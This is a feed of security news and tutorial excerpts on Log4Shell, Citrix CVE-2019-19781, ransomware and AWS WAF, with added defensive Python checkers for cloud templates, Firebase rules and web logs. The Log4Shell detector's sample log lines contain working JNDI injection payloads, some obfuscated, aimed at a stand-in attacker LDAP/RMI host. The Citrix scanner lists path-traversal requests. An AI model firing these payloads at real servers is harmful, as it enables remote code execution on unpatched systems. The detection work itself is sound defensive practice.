Watering Hole Attacks Push ScanBox Keylogger
Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
https://threatpost.com/watering-hole-attacks-push-scanbox-keylogger/180490/

Tentacles of ‘0ktapus' Threat Group Victimize 130 Firms
Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
https://threatpost.com/0ktapus-victimize-130-firms/180487/

Ransomware Attacks are on the Rise
Lockbit is by far this summer's most prolific ransomware group, trailed by two offshoots of the Conti group.
https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/

Cybercriminals Are Selling Access to Chinese Surveillance Cameras
Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
https://threatpost.com/cybercriminals-are-selling-access-to-chinese-surveillance-cameras/180478/

Twitter Whistleblower Complaint: The TL;DR Version
Twitter is blasted for security and privacy lapses by the company's former head of security who alleges the social media giant's actions amount to a national security risk.
https://threatpost.com/twitter-whistleblower-tldr-version/180472/

Firewall Bug Under Active Attack Triggers CISA Warning
CISA is warning that Palo Alto Networks' PAN-OS is under active attack and needs to be patched ASAP.
https://threatpost.com/firewall-bug-under-active-attack-cisa-warning/180467/

Fake Reservation Links Prey on Weary Travelers
Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.
https://threatpost.com/reservation-links-prey-on-travelers/180462/

iPhone Users Urged to Update to Patch 2 Zero-Days
Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.
https://threatpost.com/iphone-users-urged-to-update-to-patch-2-zero-days-under-attack/180448/

Google Patches Chrome's Fifth Zero-Day of the Year
An insufficient input validation flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.
https://threatpost.com/google-patches-chromes-fifth-zero-day-of-the-year/180432/

[Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1)

https://malwaretech.com/2022/05/video-introduction-to-use-after-free-vulnerabilities-userafterfree-challenge-walkthrough-part-1.html

Socialscan – Command-Line Tool To Check For Email And Social Media Username Usage
socialscan is an accurate command-line tool to check for email and social media username usage on online platforms. Given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms. Other similar tools check username availability by requesting the profile page of the username in question and based on […]
https://www.darknet.org.uk/2022/04/socialscan-command-line-tool-to-check-for-email-and-social-media-username-usage/

[Video] Exploiting Windows RPC – CVE-2022-26809 Explained | Patch Analysis

https://malwaretech.com/2022/04/video-exploiting-windows-rpc-cve-2022-26809-explained-patch-analysis.html

CFRipper – CloudFormation Security Scanning & Audit Tool
CFRipper is a Python-based library and CLI security analyzer that functions as an AWS CloudFormation security scanning and audit tool. It aims to prevent vulnerabilities from getting to production infrastructure through vulnerable CloudFormation scripts. You can use CFRipper to prevent deploying insecure AWS resources into your Cloud environment. You can write your own compliance checks […]
https://www.darknet.org.uk/2022/01/cfripper-cloudformation-security-scanning-audit-tool/
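Three compliance checks of the kind the post says you can write yourself, as an added example that is not CFRipper's code or rule set. It reads a template in JSON form (CloudFormation YAML would need a YAML parser that the standard library lacks); the template below is constructed for the illustration, and inline SecurityGroupIngress properties are checked while standalone AWS::EC2::SecurityGroupIngress resources are not.

```python
"""Minimal CloudFormation compliance checks (added example; not CFRipper's code).

Flags three things worth catching before a stack reaches production: security
groups exposing admin ports (or every port) to the world, S3 buckets with a
public ACL or without a complete public access block, and IAM policies that
grant Action "*" on Resource "*". The template is constructed for the example.
"""
import json

ADMIN_PORTS = (22, 3389)
WORLD = ("0.0.0.0/0", "::/0")
PAB_FLAGS = ("BlockPublicAcls", "BlockPublicPolicy", "IgnorePublicAcls", "RestrictPublicBuckets")


def _listify(value):
    return value if isinstance(value, list) else [value]


def check_security_group(logical_id, props):
    findings = []
    for rule in props.get("SecurityGroupIngress", []):
        cidr = rule.get("CidrIp") or rule.get("CidrIpv6")
        if cidr not in WORLD:
            continue
        proto = str(rule.get("IpProtocol", "-1"))
        low, high = int(rule.get("FromPort", 0)), int(rule.get("ToPort", 65535))
        if proto == "-1" or any(low <= p <= high for p in ADMIN_PORTS):
            findings.append((logical_id, "SG_WORLD_ADMIN",
                             f"{cidr} can reach {proto} ports {low}-{high}"))
    return findings


def check_s3_bucket(logical_id, props):
    findings = []
    acl = props.get("AccessControl")
    if acl in ("PublicRead", "PublicReadWrite", "AuthenticatedRead"):
        findings.append((logical_id, "S3_PUBLIC_ACL", f"AccessControl={acl}"))
    pab = props.get("PublicAccessBlockConfiguration", {})
    # Template booleans may be JSON true or the string "true"; accept both.
    if not all(str(pab.get(flag)).lower() == "true" for flag in PAB_FLAGS):
        findings.append((logical_id, "S3_NO_PUBLIC_ACCESS_BLOCK",
                         "all four PublicAccessBlockConfiguration flags should be true"))
    return findings


def check_iam_policy(logical_id, props):
    findings = []
    for stmt in _listify(props.get("PolicyDocument", {}).get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if "*" in _listify(stmt.get("Action", [])) and "*" in _listify(stmt.get("Resource", [])):
            findings.append((logical_id, "IAM_STAR_STAR",
                             f"statement {stmt.get('Sid', '?')} allows every action on every resource"))
    return findings


CHECKS = {
    "AWS::EC2::SecurityGroup": check_security_group,
    "AWS::S3::Bucket": check_s3_bucket,
    "AWS::IAM::Policy": check_iam_policy,
    "AWS::IAM::ManagedPolicy": check_iam_policy,
}


def scan_template(template_json):
    """Return (logical_id, rule_id, message) for every failed check."""
    template = json.loads(template_json)
    findings = []
    for logical_id, resource in template.get("Resources", {}).items():
        check = CHECKS.get(resource.get("Type"))
        if check:
            findings.extend(check(logical_id, resource.get("Properties", {})))
    return findings


# Constructed template: two bad resources, two acceptable ones, one over-broad policy.
SAMPLE_TEMPLATE = json.dumps({
    "AWSTemplateFormatVersion": "2010-09-09",
    "Resources": {
        "BastionSG": {"Type": "AWS::EC2::SecurityGroup", "Properties": {
            "GroupDescription": "bastion", "SecurityGroupIngress": [
                {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "CidrIp": "0.0.0.0/0"}]}},
        "WebSG": {"Type": "AWS::EC2::SecurityGroup", "Properties": {
            "GroupDescription": "web", "SecurityGroupIngress": [
                {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "CidrIp": "0.0.0.0/0"},
                {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "CidrIp": "10.0.0.0/8"}]}},
        "LogsBucket": {"Type": "AWS::S3::Bucket", "Properties": {"AccessControl": "PublicRead"}},
        "DataBucket": {"Type": "AWS::S3::Bucket", "Properties": {
            "PublicAccessBlockConfiguration": {flag: True for flag in PAB_FLAGS}}},
        "DeployPolicy": {"Type": "AWS::IAM::ManagedPolicy", "Properties": {"PolicyDocument": {
            "Version": "2012-10-17",
            "Statement": [{"Sid": "AllTheThings", "Effect": "Allow", "Action": "*", "Resource": "*"}]}}},
    },
})

if __name__ == "__main__":
    for logical_id, rule_id, message in scan_template(SAMPLE_TEMPLATE):
        print(f"{rule_id:26} {logical_id}: {message}")
```

WebSG passes on purpose: HTTPS open to the world is the normal case, and SSH is limited to the private range, so a useful rule targets the combination of world-reachable source and administrative port rather than every 0.0.0.0/0 it sees. Wire a scan like this into the pipeline step that runs before `aws cloudformation deploy`, failing the build on any finding.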

Installing Rogue-jndi on Kali Linux
Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged [...]
https://www.hackingtutorials.org/general-tutorials/installing-rogue-jndi-on-kali-linux/

CredNinja – Test Credential Validity of Dumped Credentials or Hashes
CredNinja is a tool to test the validity of dumped credentials (or hashes) across an entire network or domain quickly and efficiently. At its core, you provide it with a list of credentials you have dumped (or hashes, it can pass-the-hash) and a list of systems on the domain (the author suggests scanning […]
https://www.darknet.org.uk/2022/01/credninja-test-credential-validity-of-dumped-credentials-or-hashes/

Log4Shell VMware vCenter Server (CVE-2021-44228)
Log4Shell is a critical vulnerability with the highest possible CVSSv3 score of 10.0 that affects thousands of products running Apache Log4j and leaves millions of targets potentially vulnerable. CVE-2021-44228 affects log4j versions 2.0-beta9 to 2.14.1. Log4j is an incredibly popular logging library used in many different products and various Apache frameworks like Struts2, Kafka, and [...]
https://www.hackingtutorials.org/exploit-tutorials/log4shell-vmware-vcenter-server-cve-2021-44228/
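Detection logic for the lookup strings Log4Shell relies on, as an added example that is not from the tutorial above. A plain search for `${jndi:` misses the obfuscated variants attackers used within days of the disclosure, so the normaliser resolves Log4j lookups inside-out (`${lower:}`, `${upper:}` and the `${name:-default}` form) before matching; only those lookup forms are handled, and the access-log lines are constructed for the example.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in request logs.

Added example; not from the post above. Resolves the lookups that common
obfuscations are built from, then matches the resulting ${jndi:scheme://host}.
"""
import re

_INNERMOST = re.compile(r"\$\{([^${}]*)\}")           # a lookup with no nested lookup inside
_JNDI = re.compile(r"\$\{\s*jndi:\s*([a-z]+)://([^/}:\s]+)", re.IGNORECASE)

# Constructed access-log lines: one clean, three payloads, one benign lookup.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 '
    '"${jndi:ldap://203.0.113.9:1389/Basic/Command/Base64/aWQ=}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 '
    '"${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 '
    '"${${::-j}${::-n}${::-d}${::-i}:${env:NOPE:-rmi}://203.0.113.9:1099/x}"',
    '198.51.100.8 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=${env:HOME} HTTP/1.1" 404 "curl/7.79"',
]


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j's interpolator would."""
    body = match.group(1)
    key, sep, arg = body.partition(":")
    if sep and key.lower() == "lower":
        return arg.lower()
    if sep and key.lower() == "upper":
        return arg.upper()
    if ":-" in body:                      # ${anything:-default} evaluates to default
        return body.split(":-", 1)[1]
    return match.group(0)                 # unknown lookup (jndi, env, ...): keep as is


def normalize_lookups(text, max_rounds=32):
    """Resolve nested lookups inside-out until nothing changes (bounded)."""
    for _ in range(max_rounds):
        resolved = _INNERMOST.sub(_resolve, text)
        if resolved == text:
            return text
        text = resolved
    return text


def scan_log(lines):
    """Return one record per line containing a JNDI lookup after normalisation."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        m = _JNDI.search(norm)
        if not m:
            continue
        end = norm.find("}", m.start())
        hits.append({
            "line": lineno,
            "scheme": m.group(1).lower(),
            "host": m.group(2),
            "payload": norm[m.start(): end + 1 if end != -1 else None],
            "obfuscated": _JNDI.search(line) is None,   # raw grep would have missed it
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The `host` field is what you pivot on: it is the attacker's LDAP/RMI listener, so block it at egress and search for outbound connections to it from the logging host, which is the confirmation that a payload did more than arrive in a log line.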

How to customize behavior of AWS Managed Rules for AWS WAF
AWS Managed Rules for AWS WAF provides a group of rules created by AWS that can be used to help protect you against common application vulnerabilities and other unwanted access to your systems without having to write your own rules. AWS Threat Research Team updates AWS Managed Rules to respond to an ever-changing threat landscape in order […]
https://aws.amazon.com/blogs/security/how-to-customize-behavior-of-aws-managed-rules-for-aws-waf/

The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
Recently a “design flaw” in the Microsoft Exchange’s Autodiscover protocol was discovered by researchers that allowed access to 372,072 Windows domain credentials and 96,671 unique sets of credentials from applications such as Microsoft Outlook and third-party email clients. According to Amit Serper, the person who discovered the flaw, the source of the leak is [...]
https://www.hackingtutorials.org/pentesting-exchange/the-great-leak-microsoft-exchange-autodiscover-design-flaw/

Ask Lesley: How Much Should SOC Work Suck?
“Dear Lesley, I’ve been in a MSSP Security Operations Center (SOC) for a few months as my first cybersecurity job. The work is monotonous, I have access to only a few SIEM tools, and most of what I do is handle repetitive tickets for a ton of customers all by myself on awkward shifts. I…
https://tisiphone.net/2021/09/22/ask-lesley-how-much-should-soc-work-suck/

The three most important AWS WAF rate-based rules
In this post, we explain what the three most important AWS WAF rate-based rules are for proactively protecting your web applications against common HTTP flood events, and how to implement these rules. We share what the Shield Response Team (SRT) has learned from helping customers respond to HTTP floods and show how all AWS WAF […]
https://aws.amazon.com/blogs/security/three-most-important-aws-waf-rate-based-rules/

Automatically update AWS WAF IP sets with AWS IP ranges
Note: This blog post describes how to automatically update AWS WAF IP sets with the most recent AWS IP ranges for AWS services. This related blog post describes how to perform a similar update for Amazon CloudFront IP ranges that are used in VPC Security Groups. You can use AWS Managed Rules for AWS WAF […]
https://aws.amazon.com/blogs/security/automatically-update-aws-waf-ip-sets-with-aws-ip-ranges/

AWS Shield threat landscape review: 2020 year-in-review
AWS Shield is a managed service that protects applications that are running on Amazon Web Services (AWS) against external threats, such as bots and distributed denial of service (DDoS) attacks. Shield detects network and web application-layer volumetric events that may indicate a DDoS attack, web content scraping, or other unauthorized non-human traffic that is interacting […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-review-2020-year-in-review/

Reasonable IR Team Expectations
With the surplus of ransomware attacks consistently increasing, I have unfortunately witnessed another increase – in shoddy and predatory cybersecurity incident response firms with good SEO taking advantage of victims. In some cases this may be opportunistic, and in others simply a side effect of the shortage of senior and principal level incident responders in…
https://tisiphone.net/2021/05/11/reasonable-ir-team-expectations/

Ask Lesley: From Ops to DFIR, a Tough Transition
Lesley, I am having the hardest time getting my foot in the door in an investigative role. I have spent almost 4 years at the same job, in the same role, and cannot find a way to transition out of the operations side of the house. I went into operations with the intent of doing…
https://tisiphone.net/2021/03/19/ask-lesley-from-ops-to-dfir-a-tough-transition/

How to protect a self-managed DNS service against DDoS attacks using AWS Global Accelerator and AWS Shield Advanced
In this blog post, I show you how to improve the distributed denial of service (DDoS) resilience of your self-managed Domain Name System (DNS) service by using AWS Global Accelerator and AWS Shield Advanced. You can use those services to incorporate some of the techniques used by Amazon Route 53 to protect against DDoS attacks. […]
https://aws.amazon.com/blogs/security/how-to-protect-a-self-managed-dns-service-against-ddos-attacks-using-aws-global-accelerator-and-aws-shield-advanced/

Set up centralized monitoring for DDoS events and auto-remediate noncompliant resources
When you build applications on Amazon Web Services (AWS), it's a common security practice to isolate production resources from non-production resources by logically grouping them into functional units or organizational units. There are many benefits to this approach, such as making it easier to implement the principle of least privilege, or reducing the scope of […]
https://aws.amazon.com/blogs/security/set-up-centralized-monitoring-for-ddos-events-and-auto-remediate-noncompliant-resources/

Deploying defense in depth using AWS Managed Rules for AWS WAF (part 2)
In this post, I show you how to use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. In part 1 of this post I describe the technologies […]
https://aws.amazon.com/blogs/security/deploying-defense-in-depth-using-aws-managed-rules-for-aws-waf-part-2/

Defense in depth using AWS Managed Rules for AWS WAF (part 1)
In this post, I discuss how you can use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. The post is in two parts. This first part describes […]
https://aws.amazon.com/blogs/security/defense-in-depth-using-aws-managed-rules-for-aws-waf-part-1/

Houston consulate one of worst offenders in Chinese espionage, say U.S. officials
Credits: Reuters. The United States ordered the consulate closed this week, leading China to retaliate on Friday by telling the United States to shut its consulate in the city of Chengdu, as relations between the world's two largest economies […]
http://blog.extremehacking.org/blog/2020/07/24/houston-consulate-one-of-worst-offenders-in-chinese-espionage-say-u-s-officials/

Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters
Credits: The Register. The denizens of online forums dedicated to trading in stolen credit cards have been shown to be wretched hives of scum and villainy. This not-so-surprising news comes this week via academics at Washington State University (WSU) in the US, […]
http://blog.extremehacking.org/blog/2020/07/24/shocked-i-am-shocked-to-find-that-underground-bank-card-trading-forums-are-full-of-liars-cheats-small-time-grifters/

AWS Shield Threat Landscape report is now available
AWS Shield is a managed threat protection service that safeguards applications running on AWS against exploitation of application vulnerabilities, bad bots, and Distributed Denial of Service (DDoS) attacks. The AWS Shield Threat Landscape Report (TLR) provides you with a summary of threats detected by AWS Shield. This report is curated by the AWS Threat Research […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-report-now-available/

Vint Cerf suggests GDPR could hurt coronavirus vaccine development
Credits: The Register. TCP-IP-co-developer Vint Cerf, revered as a critical contributor to the foundations of the internet, has floated the notion that privacy legislation might hinder the development of a vaccination for the COVID-19 coronavirus. In an essay written for […]
http://blog.extremehacking.org/blog/2020/05/16/vint-cerf-suggests-gdpr-could-hurt-coronavirus-vaccine-development/

Brit defense contractor hacked, up to 100,000 past and present employees' details siphoned off – report
Credits: The Register. Britain’s Ministry of Defence contractor Interserve has been hacked, reportedly leaking the details of up to 100,000 of past and current employees, including payment information and details of their next of kin. The Daily Telegraph reports that up to […]
http://blog.extremehacking.org/blog/2020/05/16/brit-defense-contractor-hacked-up-to-100000-past-and-present-employees-details-siphoned-off-report/

US officially warns China is launching cyberattacks to steal coronavirus research
Credits: CNN. The US Department of Homeland Security and the FBI issued a “public service announcement” Wednesday warning that China is likely launching cyberattacks to steal coronavirus data related to vaccines and treatments from US research institutions and pharmaceutical […]
http://blog.extremehacking.org/blog/2020/05/14/us-officially-warns-china-is-launching-cyberattacks-to-steal-coronavirus-research/

There's Norway you're going to believe this: World's largest sovereign wealth fund conned out of $10m in cyber-attack
Credits: The Register. The Norwegian Investment Fund has been swindled out of $10m (£8.2m) by fraudsters who pulled off what’s been described as “an advanced data breach.” Norfund – the world’s largest sovereign wealth fund, created from saved North Sea […] The post There’s Norway you’re going to believe this: World’s largest sovereign wealth fund conned out of $10m in cyber-attack appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/theres-norway-youre-going-to-believe-this-worlds-largest-sovereign-wealth-fund-conned-out-of-10m-in-cyber-attack/

Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID
Credits: The Register. Privacy pressure group Noyb has filed a legal complaint against Google on behalf of an Austrian citizen, claiming the Android Advertising ID on every Android device is “personal data” as defined by the EU’s GDPR and that […] The post Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/stop-tracking-me-google-austrian-citizen-files-gdpr-legal-complaint-over-android-advertising-id/

Cyber-attacks hit hospital construction companies
Credits: BBC. Interserve, which helped build Birmingham’s NHS Nightingale hospital, and Bam Construct, which delivered the Yorkshire and the Humber’s, have reported the incidents to authorities. Earlier this month, the government warned healthcare groups involved in the response to […] The post Cyber-attacks hit hospital construction companies appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/cyber-attacks-hit-hospital-construction-companies/

Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases
Credits: The Register. Security researchers at Comparitech have reported that an estimated 24,000 Android apps are leaking user data because of misconfigured Firebase databases. Firebase is a popular backend service with SDKs for multiple platforms, including Android, iOS, web, C++ and Unity (for […] The post Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/researchers-spot-thousands-of-android-apps-leaking-user-data-through-misconfigured-firebase-databases/
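The Firebase problem the excerpt describes is a Realtime Database whose security rules grant unauthenticated access, most often a root-level `".read": true` (and, worse, `".write": true`) left over from development. The following Python is an added example, not code from Comparitech, The Register or Firebase: it walks a rules document and reports every literal `true` grant, rating anonymous writes and a root-level read as critical because rules cascade downward. The two rule sets are constructed for the example, not taken from any real app.

```python
import json

# Constructed rule sets for the example (not from any real app).
# A root ".read": true makes every path in the database world-readable.
INSECURE_RULES = json.loads("""
{
  "rules": {
    ".read": true,
    ".write": true
  }
}
""")

# Restricted variant: per-user data bound to the caller's uid, and one
# deliberately public, read-only subtree.
HARDENED_RULES = json.loads("""
{
  "rules": {
    "users": {
      "$uid": {
        ".read":  "auth != null && auth.uid == $uid",
        ".write": "auth != null && auth.uid == $uid"
      }
    },
    "public_feed": {
      ".read": true,
      ".write": false
    }
  }
}
""")


def _is_open(value):
    """A grant is 'open' when it is the literal true or the string 'true'
    (Firebase accepts both forms); any other expression needs evaluation."""
    return value is True or (isinstance(value, str) and value.strip() == "true")


def find_open_rules(rules_doc):
    """Return (path, op, severity) for every unconditional grant.

    Severity: anonymous write anywhere, or anonymous read at the root, is
    'critical'; an anonymous read on a subtree is 'warning' (it may be an
    intentionally public collection, but it should be confirmed)."""
    findings = []

    def walk(node, path):
        for key, value in node.items():
            if key in (".read", ".write"):
                if _is_open(value):
                    severity = "critical" if (key == ".write" or path == "/") else "warning"
                    findings.append((path, key, severity))
            elif key.startswith("."):
                continue  # .validate / .indexOn carry no access grant
            elif isinstance(value, dict):
                walk(value, path.rstrip("/") + "/" + key)

    walk(rules_doc.get("rules", {}), "/")
    return findings


def is_world_readable(rules_doc):
    """True when the root itself grants anonymous read, i.e. the whole
    database can be dumped with a single unauthenticated request."""
    return any(op == ".read" and path == "/" for path, op, _ in find_open_rules(rules_doc))


if __name__ == "__main__":
    for name, doc in (("insecure", INSECURE_RULES), ("hardened", HARDENED_RULES)):
        print(name, find_open_rules(doc), "world-readable:", is_world_readable(doc))
```

The static check complements the live one: a database that is world-readable answers an unauthenticated GET for `/.json` at its `firebaseio.com` URL with the data itself rather than `{"error": "Permission denied"}`.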

Papa don't breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm 'hack'
Credits: The Register. Hackers are threatening to release 756GB of A-list celebs’ contracts, recording deals, and other personal info allegedly stolen from a New York law firm. The miscreants have seemingly got their hands on confidential agreements, private correspondence, contact […] The post Papa don’t breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack’ appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/papa-dont-breach-contracts-personal-info-on-madonna-lady-gaga-elton-john-others-swiped-in-celeb-law-firm-hack/

CVE-2019-19781: Citrix ADC RCE vulnerability
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products. The affected products are the Citrix Application Delivery Controller (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway), and the Citrix SD-WAN WANOP appliance. Exploiting the vulnerability could allow an unauthenticated attacker [...] The post CVE-2019-19781: Citrix ADC RCE vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/cve-2019-19781-citrix-adc-rce-vulnerability/
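The excerpt says only that the flaw lets an unauthenticated attacker in. Citrix's published mitigation for CVE-2019-19781 (support article CTX267027) blocked requests whose decoded URL contains "/vpns/" together with "/../", and that same pattern is what defenders hunted for in web logs. The following Python is an added example, not code from Hacking Tutorials or Citrix: it applies the pattern to a handful of constructed access-log lines (addresses from the RFC 5737 documentation ranges, request paths made up for the example), decoding each URL twice so that percent-encoded traversal is not missed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log lines in combined-log style; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Jan/2020:03:14:07 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 83
198.51.100.7 - - [11/Jan/2020:03:15:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 4123
198.51.100.9 - - [11/Jan/2020:03:16:30 +0000] "GET /vpn/..%2Fvpns%2Fcfg%2Fsmb.conf HTTP/1.1" 200 83
198.51.100.9 - - [11/Jan/2020:03:16:31 +0000] "GET /vpn/%252e%252e/vpns/cfg/smb.conf HTTP/1.1" 200 83
192.0.2.44 - - [11/Jan/2020:03:17:01 +0000] "GET /logon/LogonPoint/index.html HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise(path):
    """Decode twice and lower-case: a single %2F hides a slash, and a
    double-encoded %252e survives one decoding pass as %2e."""
    return unquote(unquote(path)).lower()


def is_traversal_to_vpns(path):
    """Same condition as the Citrix responder policy: the decoded URL names
    the /vpns/ tree and contains a dot-dot segment."""
    p = normalise(path)
    return "/vpns/" in p and "/../" in p


def scan_log(text):
    """Return one record per request that matches the traversal pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the scan
        if is_traversal_to_vpns(m["path"]):
            hits.append({
                "ip": m["ip"], "ts": m["ts"], "status": m["status"],
                "path": m["path"], "decoded": normalise(m["path"]),
            })
    return hits


def suspicious_sources(text):
    """Count matching requests per client address."""
    return Counter(h["ip"] for h in scan_log(text))


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} {h["status"]} {h["decoded"]}')
    print(suspicious_sources(SAMPLE_LOG))
```

A 200 on a traversal request is the strong signal, since an unpatched appliance served the file; the same request answered with 403 after the responder policy was applied shows an attempt that was blocked. Either way, addresses that recur deserve a look at what they requested next.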

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
For all scans so far, we've only used the default scan configurations such as host discovery, system discovery and Full & fast. But what if we don't want to run all NVTs on a given target (list) and only test for a few specific vulnerabilities? In this case we can create our own custom scan [...] The post Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/openvas-9-part-4-custom-scan-configurations/

Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
In the previous parts of the Vulnerability Scanning with OpenVAS 9 tutorials we have covered the installation process and how to run vulnerability scans using OpenVAS and the Greenbone Security Assistant (GSA) web application. In part 3 of Vulnerability Scanning with OpenVAS 9 we will have a look at how to run scans using different [...] The post Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-with-openvas-9-scanning-the-network/

Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
In the previous tutorial, Vulnerability Scanning with OpenVAS 9.0 part 1, we've gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we've also installed a virtual machine with Metasploitable 2 [...] The post Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-0-part-2/

Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup
A couple years ago we did a tutorial on Hacking Tutorials on how to install the popular vulnerability assessment tool OpenVAS on Kali Linux. We’ve covered the installation process on Kali Linux and running a basic scan on the Metasploitable 2 virtual machine to identify vulnerabilities. In this tutorial I want to cover more details [...] The post Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-pt-1/

The Best Hacking Books 2018
One of the most popular and most asked questions since I’ve started this blog is if I can recommend some good hacking books to read for beginners and more experienced hackers and penetration testers. In this article I want to highlight some hacking books and InfoSec books that I personally liked that cover subjects such as ethical hacking, [...] The post The Best Hacking Books 2018 appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/infosec-books/the-best-hacking-books-2018/